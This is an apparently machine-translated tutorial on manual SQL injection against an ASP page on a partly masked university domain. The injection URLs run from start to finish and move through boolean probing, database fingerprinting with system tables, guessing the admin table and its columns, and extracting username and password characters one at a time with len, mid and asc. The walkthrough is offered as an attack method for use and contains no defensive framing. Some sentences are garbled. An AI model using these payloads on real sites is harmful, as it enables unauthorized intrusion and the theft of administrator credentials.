After such a long period of SQL injection, I can demonstrate that some of my friends will not inject it manually. Master skipped.
We all know that injection is generally generated on a variable that has not been taken into consideration, such as ID? = XX.
The following uses this URL as an example:
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and 1 = 1 returns normal
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and 1 = 2 returned error
1 = 1 is true, 1 = 2 is false, so a normal error is returned.
The SQL data is changed to the following:
Select * from table name where field = 24
Or:
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and 1 = 1
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and 1 = 2
If the injection exists, the system table is used to determine whether the database is ACC or MSS.
The ACCESS system table is msysobjects, and has no ACCESS permission in the WEB environment, while the SQL-SERVER system table is sysobjects,
Access permission in the WEB environment. For the following two statements:
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and (select count (*) from sysobjects)> 0
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and (select count (*) from msysobjects)> 0
If the database is a SQL-SERVE, the first, the web page, must be running normally, the second is abnormal; if the ACCESS is both will be abnormal.
The two databases submitted after the submission are all abnormal and can be regarded as ACC databases.
Figure 3.
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and (select count (*) from Table Name)> 0
If the table name already exists, the system returns a normal and non-page error.
At the beginning, I submitted:
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and (select count (*) from admin)> 0
An error is returned, indicating that the ADMIN table does not exist. If you submit the table later, the returned result is normal:
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and (select count (*) from article_admin)> 0
The table article_admin exists.
Guess column Name:
And (select count (field name) from article_admin)> 0
Submit:
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and (select count (username) from article_admin)> 0
If the returned result is normal, submit:
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and (select count (password) from article_admin)> 0
The returned result is normal, indicating that the username and password fields exist.
The length of the username and password;
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and (select top 1 len (username) from article_admin) = 5
The returned result is normal. The length of username is 5.
Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and (select top 1 len (password) from article_admin) = 16
Normally, the length of the password is 16, that is, the MD5 value.
Guess the username and password content:
Asp? Http://zsb.xxx.edu.cn/2j.asp? Id = 24 and (select top 1 asc (mid (username, 1, 1) from article_admin) = 97
The returned result is normal, indicating that the first content in the first username is 97 of the ASC code, that is,.
Assume that the second digit can change username, to username.
If you change username to password, you will be OK.